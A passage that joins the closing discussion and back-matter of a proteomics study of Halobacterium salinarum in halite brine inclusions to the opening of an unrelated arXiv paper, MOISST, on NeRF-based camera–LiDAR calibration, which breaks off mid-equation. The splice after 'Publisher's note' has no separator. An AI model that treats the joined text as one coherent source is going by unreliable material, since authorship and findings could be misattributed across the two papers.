The presence of nutrients seemed to diminish rather than increase the duration of survival. While Gramain et al. (2011) observed growth of _H. salinarum_ NRC-1 after 27 months of entombment in halite, there were some notable differences in the experimental parameters used. Gramain et al. (2011) used evaporation buffers with different nutrient compositions (either without nutrients or with the addition of 0.01% Difco yeast extract and 0.0075% Merck casein hydrolysate, diluted from the standard concentrations of 1% and 0.75%, respectively, in modified Payne's medium; Payne et al., 1960), incubated the resulting salt crystals in the dark at room temperature rather than with a 12 h:12 h diurnal cycle at 37°C as used here, and did not appear to employ halite surface sterilization or cleaning protocols prior to these survival tests. In contrast, our viability tests of _H. salinarum_ cells from internally inoculated crystals incubated at 37°C over 80 days, prior to being subjected to surface organics cleaning treatments, dissolution and culturing, showed no growth. The shorter duration of survival observed for _H. salinarum_ cells inside halite in our study may be the result of increased metabolic activity due to the higher concentration of nutrients in the TNPA solution compared to the 100-fold diluted modified Payne's medium used in Gramain et al. (2011). _H. salinarum_ is capable of regulating changes in metabolic pathways in response to changes in carbon source availability (Schmid et al., 2009). This could result in an inhibitory effect due to the accumulation of metabolic waste products (Nystrom, 2004) within the closed microenvironment of halite brine inclusions. The products of arginine fermentation include ornithine, CO\({}_{2}\) and NH\({}_{4}^{+}\). While the addition of peptone in the present study provided sufficient trace elements (Mg\({}^{2+}\), K\({}^{+}\), etc.) for nominal cell functions and S-layer stability at the moment of halite formation, these nutrients may be depleted over time within the closed environment of brine inclusions (Kixmuller and Greie, 2012), concurrent with the buildup of waste products. In contrast, Winters et al. (2015) showed that starvation of _H. salinarum_
leads to smaller cell size, and hypothesized that this condition could contribute to extended survival within halite brine inclusions. This is somewhat counter-intuitive, as natural evaporite environments contain the lysed remains of dead cells and other sources of organics. On the other hand, in the absence of surface sterilization of the halite used in the viability studies of Gramain et al. (2011), some of the surviving cells observed in that study may have been surface-adhered cells rather than cells within the halite brine inclusions. These results also suggest a possible survival advantage for cells on halite surfaces rather than those within the brine inclusions over the early stages of evaporation and acclimation, a hypothesis supported by the findings of Gramain et al. (2011) showing no difference in growth for _H. salinarum_ cells evaporated in salt buffer without nutrients and those containing the diluted Payne's medium nutrients. This epilithic lifestyle is likely supported in part by the organics, K, and Cl observed in this study by SEM-EDX analyses to accumulate on the halite surface, derived from the lysis of _H. salinarum_ cells. It is important to note that the vacuum conditions for SEM observations may have resulted in rupture of unfixed _H. salinarum_ cells, which might otherwise have remained intact under normal atmospheric conditions. Altogether, these results on surface contamination confirm that the isolation of proteins exclusively from halite brine inclusions requires the removal of halite surface-bound cells and biomolecules.

### Removal of halite surface-bound microorganisms and biomolecules

The small size of laboratory-grown halite precludes the use of treatment processes that could result in salt dissolution. Cold atmospheric plasmas were therefore tested in an effort to avoid the use of liquid cleaners, based on their effectiveness for the sterilization of spacecraft surfaces for planetary protection (Shimizu et al., 2014) and for agricultural applications (Judee et al., 2018). Unfortunately, none of the plasma conditions tested in this study (gas mixtures, power delivery modalities) enabled complete removal of proteins from the rough-textured halite surfaces. However, the results remain encouraging insofar as cold plasma demonstrated some proteolytic effect, which must now be amplified. Further experiments will be required to design an ad hoc plasma process delivering active species at higher densities while treating the whole surface of halite crystals regardless of their surface roughness, dimensions or dielectric permittivity.

The deactivation of microorganisms and removal of nucleic acids from halite surfaces were therefore instead performed by adapting chemical wash methods first developed by Rosenzweig et al. (2000) and then optimized by Gramain et al. (2011) and Sankaranarayanan et al. (2011). By reducing the exposure times in sequential NaOCl, NaOH, and HCl treatments, and replacing passive chemical baths with an active-spray process, we were able to achieve sufficient proteolysis of surface-bound proteins for downstream isolation of proteins exclusively from within halite brine inclusions, while avoiding halite dissolution during treatment. Compared to total proteins extracted from surface-sterilized internally inoculated crystals (on the order of 1 mg), residual surface-bound proteins (51.6 µg) were marginal.
However, observations of residual pigmentation after removal of halite surface-bound proteins suggest the presence of non-protein pigments such as carotenoids. Further refinements are therefore needed before future studies can isolate lipids exclusively from within halite brine inclusions.

### Benefits and limitations of the TRIzol-based method for direct extraction of biomolecules from halite brine inclusions

TRIzol reagent has the distinct benefit of allowing the sequential separation of RNA, DNA, and proteins. TRIzol-based protein extraction methods have previously been used and validated to study proteins from liquid cultures of haloarchaea (Kirkland et al., 2006; Bidle et al., 2008). In this study, we developed and employed a modified procedure that allowed for direct protein extraction from salt crystals, with subsequent desalting steps compatible with semi-quantitative mass spectrometry analyses of these high-salt extracts. Most importantly, our approach avoids bias in the proteome due to alterations in protein expression over the extended times needed for slow crystal dissolution prior to protein extraction using other methods.

Although peripheral membrane proteins were identified using this approach, transmembrane peptides were absent from the mass spectrometry dataset. We hypothesize that this was due to retention of transmembrane protein domains with the lipid membrane fraction, in the residual phenol phase remaining after protein precipitation with isopropanol during TRIzol extraction (see Supplementary Figure 2-1). Importantly, some transmembrane proteins could still be identified by peptides outside the membrane-spanning domains, e.g., the ArcD arginine-ornithine antiporter protein, for which seven cytosolic- and extracellular-facing peptides were identified (see Supplementary Figure 7-1). However, not all transmembrane proteins were identified, as evidenced by the lack of identified peptides for bacteriorhodopsin in any samples (stationary phase liquid cultures and brine inclusions). One plausible explanation of this phenomenon is the desalting effect of isopropanol (as suggested by Kirkland et al. (2006)), which can result in increased protein instability, leading to loss of conformation and subsequent peptide fragmentation for peptides outside the transmembrane regions. While these results indicate that further membrane disruption steps may be needed for complete extraction of all transmembrane proteins, similar to the protocol used by Podechard et al. (2018) to isolate membrane lipids using TRIzol, the potential bias introduced by our methodology is limited, as evidenced by the identified peptides on either side of the lipid membrane. Moreover, while TRIzol-based methods have been used for RNA extraction from liquid cultures of _H. salinarum_ (De Lomana et al., 2020), the method was shown here to produce RNA from halite fluid inclusions of insufficient quality for RNA-Seq. Indeed, further desalting steps would need to be developed and optimized for the extraction of high-quality RNA (see Supplementary Information Section 8 for further details).

### Postulate of a cellular origin for the total brine-extracted proteome

The proteins extracted using the protocol presented here represent the total protein complement of the halite brine inclusions. These proteins may be components of viable or non-viable cells, or even proteins released by cells into the extracellular environment of the brine inclusions.
Many questions remain about the potential for salts to preserve proteins over time as molecular biosignatures, particularly within the protected microenvironment of evaporite brine inclusions. Considering that viability tests performed on the internally inoculated halite crystals demonstrate cell viability after two months of _H. salinarum_ entrapment, we postulate here a cellular origin for the extracted proteins.

### Acclimation of _Halobacterium salinarum_ to halite brine inclusions

We applied the slow laboratory evaporation method to _H. salinarum_ cultures in TNPA buffer, followed by removal of halite surface-bound cells and organics (particularly proteins) and selective extraction of proteins from within halite brine inclusions, as described in the preceding sections. This allowed us to study the early (two months) acclimation of the haloarchaeal cells to halite brine inclusions using a proteomics approach. Stationary growth phase cultures were used as a control to approximate the cell physiology prior to a slow evaporative process. Our analyses were focused on two main themes: (1) cell activity, and (2) interactions between cells and the local microenvironment within the brine inclusion.

Halite brine inclusions are enclosed microenvironments. While questions remain about possible alterations of brine inclusion composition over geological time scales, during the initial phase after crystal formation the composition reflects that of the initial hypersaline environment. Conditions of near-saturating salt concentrations lead to low dissolved oxygen available to cells. Cells are therefore hypothesized to be in a physiological state similar to stationary growth phase, with low cell division and altered metabolic activity. Here we examined proteome alterations in response to acclimation to this unique microenvironment.

#### Cell activity within halite brine inclusions

The metabolism of Halobacterium cells trapped within brine inclusions is hypothesized to shift from aerobic metabolism via the respiratory chain to anaerobic fermentation through the arginine deaminase (ADI) pathway or to ATP generation via photoheteroorganotrophy. Halite incubations were performed in this study with a 12 h:12 h light:dark photoperiod, allowing for both phototrophy via bacteriorhodopsin and arginine fermentation under the oxygen-limited conditions (Hartmann et al., 1980) presumed to exist inside closed brine inclusions. These two ATP-generating pathways are antagonistic in liquid cultures of _H. salinarum_, but could theoretically alternate over the diurnal cycle used here to simulate surface conditions during the two months after halite precipitation. However, exposure to light also depends on the location of the brine inclusion within the halite crystal, with inclusions near the crystal surface receiving higher total irradiance than inclusions near the crystal center. While the extraction protocol used enabled identification of phototrophy-related proteins such as bacteriorhodopsin activators, it did not allow for extraction of many membrane proteins, including bacteriorhodopsin itself. Thus, it is not possible to determine whether phototrophy-related proteins were differentially expressed in liquid and halite samples. Under anaerobic conditions, Hartmann et al. (1980) showed that while retinal biosynthesis was inhibited by the absence of oxygen, even low levels of bacteriorhodopsin could produce appreciable levels of ATP. A basal expression of proteins for different ATP-generating pathways could enable the survival of _H. salinarum_
in the early stages of halite entrapment. Additionally, the potential exists for biomolecule recycling within brine inclusions, similar to that demonstrated by prokaryotes in the deep subsurface (Thomas et al., 2019) or other resource-limited environments, to limit the energy consumption linked to biosynthesis. The reduced viability of _H. salinarum_ in brine inclusions in the presence of organics, including arginine, compared to starvation conditions points to a fermentative metabolism leading to the accumulation of metabolic waste products. Confirmation of the precise metabolic pathways used by _H. salinarum_ within halite brine inclusions will require further analyses, overcoming the challenges of accessing the closed halite system.

Acclimation to the halite brine inclusion microenvironment could presumably involve reduced or silenced cell division, DNA replication and repair pathways. However, the majority of detected proteins implicated in genome maintenance were not differentially expressed between halite brine inclusions and stationary growth phase cultures. This suggests either that such proteins are constitutively expressed, or that DNA replication and cell division occur in a similar fashion for both stationary growth phase cells and those within halite brine inclusions. While early acclimation to the halite brine inclusion microenvironment resulted in nuanced differences in the proteome of _H. salinarum_ cells regarding cell division, replication, DNA repair and transcriptional processes, stark differences were observed for proteins involved in translational activities. Among the shared proteome showing no differential expression between conditions were proteins involved in DNA replication, repair and transcriptional pathways. This suggests similar levels of genome maintenance between late growth stage cultures and brine entombment. However, translation-related proteins were strongly under-represented in brine extracts, potentially indicating decreased de novo protein synthesis compared to stationary cells. These seemingly contradictory results could be explained by transcriptional activity directed not toward mRNA synthesis but toward regulatory RNA. However, this hypothesis is not fully satisfactory, as tRNA synthesis and ribosome biogenesis protein quantities remained similar for both conditions.

Taken together, these data suggest a model for cellular activity during early acclimation to halite brine inclusions highly similar to that of stationary growth phase cells in liquid culture. Active metabolism appears to continue, with data suggesting anaerobic fermentation. However, it is important to note that the extraction method used had limited success in isolating membrane proteins such as bacteriorhodopsin and the sensory rhodopsins. Therefore, their absence from this dataset cannot be taken as confirmation of their absence in the cell, and as such, diurnal cycling between anaerobic metabolisms (arginine fermentation in the dark and photoheteroorganotrophy in the light) cannot be ruled out. It is important to note as well that the proteomic analyses considered all brine inclusions of a given crystal in a bulk analysis that did not distinguish between brine inclusions near the crystal surface, which receive higher irradiance, and those deeper within the crystal. Cells maintain at least a capacity for central metabolism, DNA repair, replication, and even cell division comparable to that of stationary growth phase cells. However, acclimation to the closed brine inclusion microenvironment appears to severely limit translational activity.
Nonetheless, expressed proteins are preserved, indicating low levels of protein turnover. This raises the question of how cells are able to interface with the surrounding microenvironment within the inclusions.

#### Interactions between cells and the brine inclusion microenvironment

We examined the potential interactions between _H. salinarum_ cells and the local microenvironment within halite brine inclusions, focusing on cell surface and motility processes involved in responses to external stimuli. Previous investigations of the survival of Halobacterium cells trapped within salt crystals have proposed potential cell envelope modifications, with shedding of the surface proteinaceous layer (S-layer) (Fendrihan et al., 2012). However, this result seems to be due to a lack of trace elements in the TN buffer (4.28 M NaCl, Tris-HCl pH 7.4) used in the 2012 study, as argued by Kixmuller and Greie (2012). The peptone added to the TNPA crystallization buffer used here provided sufficient trace elements (including Mg, Ca, K) for S-layer maintenance and cell envelope function. S-layer shedding within halite brine inclusions was previously thought to improve exchanges between cells and the local microenvironment. However, in this study, S-layer proteins were identified in all liquid culture and halite samples without significant up- or down-regulation. This indicates either that the S-layer is maintained by _H. salinarum_ cells, or that the S-layer proteins were preserved within the brine inclusions. The fact that S-layer protein quantities remained comparable to those of stationary phase cultures with intact S-layers suggests that the S-layer proteins remain associated with _H. salinarum_ cells within brine inclusions.

The increased expression of membrane transporters suggests that transport capacity is not only maintained but enhanced in cells during acclimation to halite brine inclusions, likely to maximize extraction of essential molecules and trace elements from the local microenvironment. This may represent a form of biomolecule recycling similar to that demonstrated by prokaryotes in the deep subsurface (Thomas et al., 2019) or other resource-limited environments to limit the energy consumption linked to biosynthesis. The up-regulation of the glycerol-3-phosphate-binding protein precursor may suggest a role for membrane lipid modification within brine inclusions.

Cell motility could logically be assumed to be of lesser importance for _H. salinarum_ cells inside the restricted microenvironment of a brine inclusion. The small volume of such inclusions limits the heterogeneity of available oxygen and nutrients, as well as constraining the ability of cells to move away from potentially damaging elements. However, the detection of the Htr signal transducers of sensory rhodopsins I and II as part of the common proteome of all conditions tested indicates that, despite being constrained to brine inclusions, phototaxis signaling remains functional both prior to and after evaporation of _H. salinarum_ cultures. In contrast, down-regulation of GvpO of clusters A and B was observed in halite brine inclusion extracts. A similar down-regulation was observed for gvpO mRNA in response to UV irradiation (Baliga et al., 2004), and for GvpO protein expression levels after exposure to ionizing radiation (Webb et al., 2013). Lack of the GvpO gas vesicle expression regulator is thought to inhibit gas vesicle formation, and growth by anoxic arginine fermentation is also known to reduce the number of gas vesicles in _H. salinarum_ NRC-1 (Hechler and Pfeifer, 2009).
Therefore, the lack of gas vesicle production could be linked to anaerobic metabolism. Gas vesicle down-regulation suggests a reduced need for vertical movement in a water column in response to oxygen levels, consistent with the restricted confines of microscopic halite brine inclusions. This correlates with previously published transcriptomics and proteomics studies on _H. salinarum_ cells showing the impact of salinity and dissolved oxygen concentrations on motility (Schmid et al., 2007; Leuko et al., 2009). While the sensory pathways leading to cell motility remain intact, the proteins required for motility itself are absent. Our data show a general down-regulation of the archaellin proteins involved in motility for cells in brine inclusions compared to stationary phase liquid cultures. Thus, while chemo- and phototaxis proteins (including Che-family proteins and Htr signal transducers) are maintained in brine inclusions, the accompanying archaellum-driven motility is not. Reduced motility may be induced in halite brine inclusions to preserve energy. The expression of multiple transducer proteins is often correlated with changing environmental conditions, and in this case these may be remnant proteins from the acclimation of _H. salinarum_ to halite brine inclusions.

## 5 Conclusion

This is the first study to demonstrate the possibility of isolating proteins directly and efficiently from halite brine inclusions while simultaneously excluding surface-bound contaminating proteins and avoiding the changes in cellular protein expression that occur during slow salt dissolution. This work also provides the first insights into the molecular mechanisms involved in the early acclimation of _H. salinarum_ to brine inclusions. Based on our findings, the cells of _H. salinarum_ appear to be in a low-activity "maintenance" or "semi-dormant" state, similar to other bacteria and archaea in low-energy environments such as the deep biosphere (reviewed in Lever et al. (2015)). Whether or not _H. salinarum_ cells inside brine inclusions are true "persister" cells (Megaw and Gilmore, 2017) will require future study. Further investigation is also needed to explore the hypothesis of biomolecule recycling similar to that observed in deep sediments (Thomas et al., 2019). Despite the reasonable assumption that brine inclusions represent stress conditions for Halobacterium cells, no increased expression of stress-response proteins such as chaperones was observed. The acclimation to the halite environment may therefore be less a stress response than a reduction in cell activity.

Shifts in the proteome of _H. salinarum_ NRC-1 have previously been studied using liquid cultures under conditions similar to those thought to exist inside halite brine inclusions: reduced oxygen content (Schmid et al., 2007), increased salinity (Leuko et al., 2009), and transitions from aerobic to anaerobic growth (Tebbe et al., 2009). While the down-regulation of certain ribosomal proteins and archaellum precursors was also observed following salinity stress (Leuko et al., 2009), not all protein expression shifts conformed to this pattern. The same was observed for the transition from aerobic to anaerobic growth, with increased expression of the arginine deaminase as observed by Tebbe et al. (2009), but with other protein expression differences, likely due to the use of culturing conditions that were not identical to those of previous studies.
Thus, while proteomics analyses from liquid cultures can provide hints to aid in the interpretation of the data presented here, they cannot fully explain the observed patterns of protein expression within halite brine inclusions. The unique environment of halite brine inclusions limits the exchange of nutrients between cells and their surroundings. It also allows for the buildup of metabolic waste products, which appear to limit the duration of cell viability within the brine inclusions. Further functional investigations are clearly needed to confirm the hypotheses generated by the proteomics data in this study, particularly with regard to cell activity. While this study does not resolve the question of how long microorganisms are able to retain viability within halite brine inclusions, it offers clear insights into the process of early acclimation of halophilic archaea to the evaporation of hypersaline environments. The methodologies presented here will also enable future studies of the biomolecules of microorganisms in halite inclusions in natural settings, particularly in small halite crystals.

### Data availability statement

The datasets presented in this study can be found in online repositories. The names of the repository/repositories and accession number(s) can be found in the article/Supplementary material.

### Author contributions

The study was designed by AK in collaboration with CF, with the participation of AH and SZ in experimental design and supervision. Experiments were conducted by CF, with the help of MM for crystal formation, AM and RP for mass spectrometry and improvements of extraction methods, BA-B for nanoLC-MS/MS data acquisition, FG for SEM-EDX analyses, AT for RNA extraction, and TD for plasma treatments. Proteomics data treatments were conducted by AT and CF. The manuscript was written by CF. All authors contributed to the article and approved the submitted version.

### Funding

This work was supported by the X-life program of CNRS-MITI, the ATM program of the Museum National d'Histoire Naturelle, the French National Research Agency ANR-PRCI "ExocubeHAD" project (ANR-21-CE49-0017-01_ACT), and Sorbonne Universite (graduate stipend to CF).

### Acknowledgments

UHPLC-MS/MS data were acquired at the Plateau Technique de Spectrometrie de Masse Bio-organique, UMR 7245 Molecules de Communication et d'Adaptation des Microorganismes, Museum national d'Histoire naturelle, Paris, France. The nanoLC-MS/MS data were acquired at the ProGenoMix MS platform (IBISA-labeled), at CEA/SPI/U2D. Thanks to Imene Esteve of the FIB and SEM facility of IMPMC, which was supported by Region Ile de France Grant SESAME 2006 NOI-07-593/R, Institut National des Sciences de l'Univers (INSU)-CNRS, Institut de Physique-CNRS, Sorbonne Universite, and the French National Research Agency (ANR) grant ANR-07-BLAN-0124-01. Parts of figures used images from Servier Medical Art. Servier Medical Art by Servier is licensed under a Creative Commons Attribution 3.0 Unported License ([https://creativecommons.org/licenses/by/3.0/](https://creativecommons.org/licenses/by/3.0/)).

### Conflict of interest

The authors declare that the research was conducted in the absence of any commercial or financial relationships that could be construed as a potential conflict of interest.

### Publisher's note
2303.03056
MOISST: Multimodal Optimization of Implicit Scene for SpatioTemporal calibration
With the recent advances in autonomous driving and the decreasing cost of LiDARs, the use of multimodal sensor systems is on the rise. However, in order to make use of the information provided by a variety of complementary sensors, it is necessary to accurately calibrate them. We take advantage of recent advances in computer graphics and implicit volumetric scene representation to tackle the problem of multi-sensor spatial and temporal calibration. Thanks to a new formulation of the Neural Radiance Field (NeRF) optimization, we are able to jointly optimize calibration parameters along with scene representation based on radiometric and geometric measurements. Our method enables accurate and robust calibration from data captured in uncontrolled and unstructured urban environments, making our solution more scalable than existing calibration solutions. We demonstrate the accuracy and robustness of our method in urban scenes typically encountered in autonomous driving scenarios.
Quentin Herau, Nathan Piasco, Moussab Bennehar, Luis Roldão, Dzmitry Tsishkou, Cyrille Migniot, Pascal Vasseur, Cédric Demonceaux
2023-03-06T11:59:13Z
http://arxiv.org/abs/2303.03056v3
# MOISST: Multi-modal Optimization of Implicit Scene for SpatioTemporal calibration

###### Abstract

With the recent advances in autonomous driving and the decreasing cost of LiDARs, the use of multi-modal sensor systems is on the rise. However, in order to make use of the information provided by a variety of complementary sensors, it is necessary to accurately calibrate them. We take advantage of recent advances in computer graphics and implicit volumetric scene representation to tackle the problem of multi-sensor spatial and temporal calibration. Thanks to a new formulation of the implicit model optimization, we are able to jointly optimize calibration parameters along with scene representation based on radiometric and geometric measurements. Our method enables accurate and robust calibration from data captured in uncontrolled and unstructured urban environments, making our solution more scalable than existing calibration solutions. We demonstrate the accuracy and robustness of our method in urban scenes typically encountered in autonomous driving scenarios.

## I Introduction

Most robotic and intelligent systems rely heavily on sensory information to achieve various tasks. Moreover, commonly encountered sensor setups for autonomous driving consist of multiple sensors acquiring different data modalities (e.g., cameras, LiDARs, IMUs, GNSS systems, etc.) which can greatly improve the performance on different tasks such as mapping [1], localization [2] and perception [3]. However, to correctly exploit and merge the information provided by all sensors, it is important to represent their data in a common reference frame. Spatial extrinsic calibration is the process that determines the relative geometric transformation between the sensor poses by considering a 6-DoF rigid-body transformation. Although accurate spatial calibration is essential in multi-sensor setups, it is often not sufficient due to time synchronization issues between the different sensors. Time synchronization is the process that determines the time offset between the different sensor measurements, in cases where there is no hardware synchronization that would eliminate any delay. Current existing methods commonly require the use of calibration targets placed in the scene to fuse all sensors in a common frame [4, 5]. This is impractical in many cases, especially for dynamic tasks, where the calibration setup must be redone regularly. Although some papers offer solutions to bypass this constraint by detecting salient geometric features (e.g., edges [6, 7], planes [8]) within acquired scenes, such features might not be present in all kinds of environments. Furthermore, these methods often do not consider the possible asynchronization of the sensors. A wrongly synchronized rig can have a consequential impact on performance, depending on the task. Moreover, time offsets left unaccounted for during calibration can strongly degrade extrinsic estimation, leading to suboptimal results. Considering all the issues mentioned above, we introduce our new method called MOISST: Multi-modal Optimization of Implicit Scene for SpatioTemporal calibration. MOISST is a novel calibration method which leverages an implicit neural 3D scene representation known as Neural Radiance Fields (NeRF) [9]. It can be trained with any kind of sensor providing radiometric or geometric information on a given 3D scene. This representation is by nature the common reference frame used for the sensor fusion.
We take advantage of the differentiable property of our scene representation to simultaneously learn the scene's geometry and colors, and the poses given to the neural network. Unlike existing NeRF-based methods of pose regression [10, 11, 12], we consider the rigid constraint in the multi-sensor rig to reduce the number of optimized parameters. By using a time-parameterized differentiable formulation for the main sensor trajectory, we can also detect and compensate for potential time offsets between the sensors. To the best of our knowledge, tackling the problem of multi-sensor spatiotemporal calibration using implicit representations has not been proposed before in the literature.

Fig. 1: Effect of calibration on novel view synthesis: training positions in red, ground truth positions in green, reference position in blue. The RGB images (top) and depth maps (middle) are rendered from an implicit neural 3D scene trained from non-calibrated (left) and calibrated with MOISST (right) sensors.

Thanks to our formulation, we are able to propose a targetless solution to the spatiotemporal calibration of multi-modal sensors that is also structureless, as we do not require specific geometric structures such as edges or planes in the scene. Compared to other methods and because of the aforementioned characteristics of our solution, MOISST is especially adapted to perform automatic re-calibration of a multi-sensor device during the full life-cycle of the system. MOISST is a simple (_it can be run from acquisition data recorded in any environment_) and inexpensive (_it does not require targets or external hardware_) calibration solution; these are crucial features for robots and large-scale fleets of autonomous vehicles.

## II Related Work

### _Multi-modal extrinsic and temporal calibration_

Extrinsic calibration for multi-modal sensors is a well-studied subject that can be categorized into two main groups: target-based and targetless methods. #### Ii-A1 Target-based calibration Zhang _et al._[4] were the first to introduce the use of a planar checkerboard target for camera and laser range finder calibration, by using the latter to determine the checkerboard plane, and the pattern seen by the camera to calculate its pose. Three pairs of captured measurements are enough to deduce the extrinsic parameters between the two sensors. Geiger _et al._[5] propose a solution to calibrate the sensors with a single capture, by placing multiple targets in the scene. While these methods provide satisfactory calibration accuracy, they necessitate the placement of targets in the scene, which might not be available or practical in typical real-world scenarios. #### Ii-A2 Targetless calibration Targetless methods usually use the concept of mutual information, by matching corresponding elements obtained through different types of sensors. These can be edges for visible cameras, depth gradients for LiDARs [6, 7], or correspondences between image intensity and surface normals [13]. However, by relying on specific geometric features, these methods only work in well-structured scenes with noticeable, recognizable and detectable patterns such as straight lines or edges, and often work only in indoor environments. There is also a set of deep-learning-based methods [14, 15, 16] able to find the transformation between a camera capture and a LiDAR scan.
However, these methods are trained in a supervised manner, needing a labeled dataset, and are prone to overfitting, limiting their use to environments reflecting the training dataset. Although the previously mentioned methods achieve satisfactory performance given ideal conditions, they suppose a perfectly time-synchronized set of sensors, which is possible through specific hardware [17] but is often challenging and sensor dependent (e.g., most low-cost cameras do not support such features). Some methods tackle temporal calibration, both target-based [18] and targetless [8]; however, they require additional sensors such as a calibrated camera-IMU pair to obtain a precise trajectory. With the methods proposed by Taylor _et al._[19] and Park _et al._[20], visual and LiDAR odometry are used to calculate trajectories for each sensor and match them, allowing for both spatial and temporal calibration. Nevertheless, this approach can generate a progressive drift with the accumulated transformations between the frames. Contrary to the previously mentioned methods, MOISST does not require any targets (i.e., it is targetless) and determines both spatial and temporal calibration parameters by only relying on the poses of a single sensor, avoiding the cumulative errors in the different per-sensor trajectories. At the same time, we fuse information from all sensors, and thanks to the use of a dense implicit scene representation, we do not require specific geometric structure (i.e., it is structureless). This approach allows compatibility with a greater variety of scenes and allows us to scale to almost all real-world scenarios.

### _Neural 3D scene representation_

NeRF [9] is an implicit representation of a 3D scene primarily used for novel view synthesis. From a set of images and their corresponding camera poses, the model learns the 3D geometry by differentiable volume rendering. NeRF provides a continuous representation, resulting in improved rendering fidelity and compactness compared to classical explicit scene representations [21]. Beyond the rendering ability, many recent methods have used these implicit scene representations for downstream robotics tasks [22, 23, 24]. NeRF stores all the color and density information of the scene in a multilayer perceptron (MLP), and allows any rendering resolution as the representation is continuous. The model takes as input a 3D coordinate and a direction vector, outputs color and density information for this 3D point, and is trained through a differentiable rendering procedure. A sinusoidal encoding [25] of the input coordinate maps the low-dimensional 3D position and direction to a higher-dimensional representation, allowing the rendering of a highly detailed scene. To speed up convergence, Instant Neural Graphics Primitives (Instant-NGP) [26] was introduced, allowing much faster convergence with higher quality rendering. It uses a multi-resolution hash encoding instead of sinusoidal encoding, considerably reducing the size of the trained MLP. The training of NeRF mainly requires RGB images from cameras and, optionally, depth information such as point clouds from LiDARs [27], along with registered poses for each sensor frame. The final rendering quality is highly dependent on the precision of these poses, as seen in Fig. 1, where the result without optimization has incorrect geometry, produces low-quality novel views and is, hence, not usable.
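To make the volume-rendering background above concrete, the following minimal NumPy sketch shows how per-ray densities and colors are alpha-composited into a pixel color and an expected depth (the same principle underlies the rendering operators used later for both RGB and depth supervision). It is an illustrative sketch under our own naming conventions, not the authors' implementation.

```python
import numpy as np

def composite_ray(t_samples, densities, colors):
    """Alpha-composite colors and depths along one ray (NeRF-style volume rendering).

    t_samples: (K,) sorted distances of the K sampled points from the ray origin.
    densities: (K,) non-negative volume densities predicted by the network.
    colors:    (K, 3) RGB colors predicted by the network.
    Returns the rendered pixel color and the expected (alpha-composited) depth.
    """
    deltas = np.diff(t_samples, append=t_samples[-1] + 1e10)         # spacing between samples
    alphas = 1.0 - np.exp(-densities * deltas)                       # opacity of each segment
    trans = np.cumprod(np.concatenate(([1.0], 1.0 - alphas[:-1])))   # transmittance up to each sample
    weights = trans * alphas                                         # contribution of each sample
    rgb = (weights[:, None] * colors).sum(axis=0)                    # rendered color
    depth = (weights * t_samples).sum()                              # expected depth along the ray
    return rgb, depth

# toy example: a "surface" around t = 4 dominates the rendering
t = np.linspace(0.5, 8.0, 64)
sigma = 50.0 * np.exp(-0.5 * ((t - 4.0) / 0.2) ** 2)
col = np.tile(np.array([0.8, 0.3, 0.1]), (64, 1))
print(composite_ray(t, sigma, col))
```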
As an answer to this pose-sensitivity limitation, NeRF\({}^{--}\)[10] exploits the fully differentiable structure of NeRF to not only train the NeRF model, but also to optimize the camera poses. This makes the model robust to noisy poses, as it is able to optimize the camera poses alongside the NeRF model. SCNeRF [11] uses the first two columns of the rotation matrix to formulate rotations instead of the Rodrigues formula to achieve better convergence, and BARF [12] improves upon these methods by using low-to-high frequency release for the input positional encoding, avoiding local minima during pose optimization. In our proposal, because we focus on multi-sensor calibration, we only optimize the extrinsic transformation between the sensors instead of optimizing each pose of each frame independently. Indeed, in a rigid sensor setup, sensors are not allowed to move freely relative to each other. Compared to the aforementioned methods, this novel and calibration-focused formulation reduces the number of parameters to be optimized and is more robust to outliers thanks to the rigidity constraint imposed on each pose. The proposed formulation also allows us to optimize the time offset between sensors, which is often hard to achieve within the same optimization framework and may require additional information.

## III Method

### _Notations and background_

#### Iii-A1 Notations We consider a multi-sensor system with \(S\) sensors, where \(r\in[1,S]\) is our reference sensor and each sensor is either a camera or a LiDAR. We use the following notations to describe our method:

* \(\left\{N_{i}\right\}_{i\in[1,S]}\): the number of frames captured by each sensor,
* \(n_{i}\in[1,N_{i}]\): index of the frames captured by sensor \(i\),
* \(t^{n_{i}}\in\mathbf{R}^{+}\): the absolute timestamp of frame \(n_{i}\) relative to the sensor \(i\) clock,
* \(\delta_{i}\in\mathbf{R}\): the time offset between the reference sensor clock and the sensor \(i\) clock,
* \({}_{w}T^{i}(t)\in\mathbf{R}^{4\times 4}\): the pose transformation matrix of sensor \(i\) at time \(t\) (time relative to the sensor \(i\) clock) in the world reference,
* \({}_{j}T^{i}\in\mathbf{R}^{4\times 4}\): the extrinsic homogeneous transformation matrix from sensor \(i\) to sensor \(j\).

We aim to calibrate our system according to the reference sensor. The goal is, hence, to obtain the transformation matrices \({}_{j}T^{i}\) and time offsets \(\delta_{i}\) between the sensors to calibrate and the reference one. We consider that we know the pose of sensor \(r\) in a global frame, which could be easily obtained through SLAM [28] or Structure-from-Motion [29]. We also consider its clock as the reference clock, \(\delta_{r}=0\). From the poses of the reference sensor, \({}_{w}T^{r}(t^{n_{r}}),n_{r}\in[1,N_{r}]\), we build a continuous trajectory. We do that by interpolating between the existing poses, and extrapolating outside the defined temporal bounds by extending the transformations at the beginning and the end of the sequence. This modeling process is very similar to what is defined in [20]. For the interpolation functions, we use spherical linear interpolation (SLERP) [30] for the rotation, and linear interpolation (LERP) for the translation. We denote this interpolation function as \(\mathcal{T}_{r}\): \[{}_{w}T^{r}(t)=\mathcal{T}_{r}(t).
\tag{1}\] #### Iii-A2 Spatiotemporal calibration Given the spatial extrinsic calibration and the time offset of the other sensors regarding our reference sensor, we can compute the pose of sensor \(i\) in a global frame with the formula: \[{}_{w}T^{i}(t^{n_{i}}+\delta_{i})=\mathcal{T}_{r}(t^{n_{i}}+\delta_{i})\,{}_{ i}T^{r}. \tag{2}\] #### Iii-A3 Implicit neural scene representation An implicit neural representation models a scene with a neural network by mapping coordinates as inputs to quantities of interests, such as color or density, as outputs. By evaluating points along camera rays and composing their densities and colors through volumetric rendering, such methods can synthesize RGB images and depth maps1 from an arbitrary sensor pose. Footnote 1: We can estimate depth of ray by alpha composition of distances from the center of the ray to the sampled points. In order to train said neural network on a specific scene, it is necessary to have a training set with sensor information and a pose associated. This information may be an RGB image in the case of visible camera, or a point cloud in the case of a LiDAR. We aim to find the parameters of the neural network \(\Theta\) that minimizes the difference between the provided information (\(I^{n_{i}}\) - image \(n_{i}\) of sensor \(i\) - or \(D^{n_{i}}\) - depth information \(n_{i}\) of sensor \(i\)) and the rendered result by the model defined as: \[\mathcal{R}_{I}\left({}_{w}T^{i}(t^{n_{i}})\mid\Theta\right), \tag{3}\] 